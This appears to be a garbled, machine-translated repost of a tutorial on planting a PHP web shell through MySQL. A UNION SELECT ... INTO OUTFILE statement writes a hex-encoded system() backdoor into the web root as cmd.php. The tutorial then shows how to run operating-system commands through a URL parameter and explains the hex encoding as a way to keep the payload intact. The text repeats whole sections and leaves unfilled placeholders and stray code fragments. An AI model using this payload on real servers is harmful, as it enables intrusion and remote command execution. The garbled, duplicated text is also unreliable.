Use a Mysql statement to generate a backdoor Trojan _ MySQL

Source: Internet
Author: User
Tags mysql injection php mysql ultraedit
How to generate a backdoor Trojan using Mysql statements: SELECT * FROM 'vbb _ strikes 'WHERE1unionselect2, 3, metadata: inetpubwwwrootcmd. php Mysql injection or MySQL statement in phpmyadmin

How to generate a backdoor Trojan using Mysql statements:

     SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

The cmd. php file is generated under C:/inetpub/wwwroot/through Mysql injection or running the above statement in phpmyadmin. the content is the original vbb_strikes content, followed:

     2 3
     How to generate a backdoor Trojan using Mysql statements:

          SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

The cmd. php file is generated under C:/inetpub/wwwroot/through Mysql injection or running the above statement in phpmyadmin. the content is the original vbb_strikes content, followed:

___FCKpd___1

Again through http://www.xxx.com/cmd.php? Cmd = dir c: \ to execute the system doscommand!

Q: What are the tokens?

A: It is the hexadecimal code in the code,

          
          How to generate a backdoor Trojan using Mysql statements:

               SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

The cmd. php file is generated under C:/inetpub/wwwroot/through Mysql injection or running the above statement in phpmyadmin. the content is the original vbb_strikes content, followed:

               2 3
               How to generate a backdoor Trojan using Mysql statements:

                    SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

The cmd. php file is generated under C:/inetpub/wwwroot/through Mysql injection or running the above statement in phpmyadmin. the content is the original vbb_strikes content, followed:

___FCKpd___1

Again through http://www.xxx.com/cmd.php? Cmd = dir c: \ to execute the system doscommand!

Q: What are the tokens?

A: It is the hexadecimal code in the code,

___FCKpd___2

If this method is not used, other codes such as % xx may appear in different SQL versions. this backdoor cannot be executed! If you have other language names, you can enter them in UltraEdit and press the [Ctrl + H] Key to connect the hex in it!

REQUEST [cmd]);?>

Again through http://www.xxx.com/cmd.php? Cmd = dir c: \ to execute the system doscommand!

Q: What are the tokens?

A: It is the hexadecimal code in the code,

___FCKpd___2

If this method is not used, other codes such as % xx may appear in different SQL versions. this backdoor cannot be executed! If you have other language names, you can enter them in UltraEdit and press the [Ctrl + H] Key to connect the hex in it!

REQUEST [cmd]);?>

If this method is not used, other codes such as % xx may appear in different SQL versions. this backdoor cannot be executed! If you have other language names, you can enter them in UltraEdit and press the [Ctrl + H] Key to connect the hex in it!

REQUEST [cmd]);?>

Again through http://www.xxx.com/cmd.php? Cmd = dir c: \ to execute the system doscommand!

Q: What are the tokens?

A: It is the hexadecimal code in the code,

___FCKpd___2

If this method is not used, other codes such as % xx may appear in different SQL versions. this backdoor cannot be executed! If you have other language names, you can enter them in UltraEdit and press the [Ctrl + H] Key to connect the hex in it!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.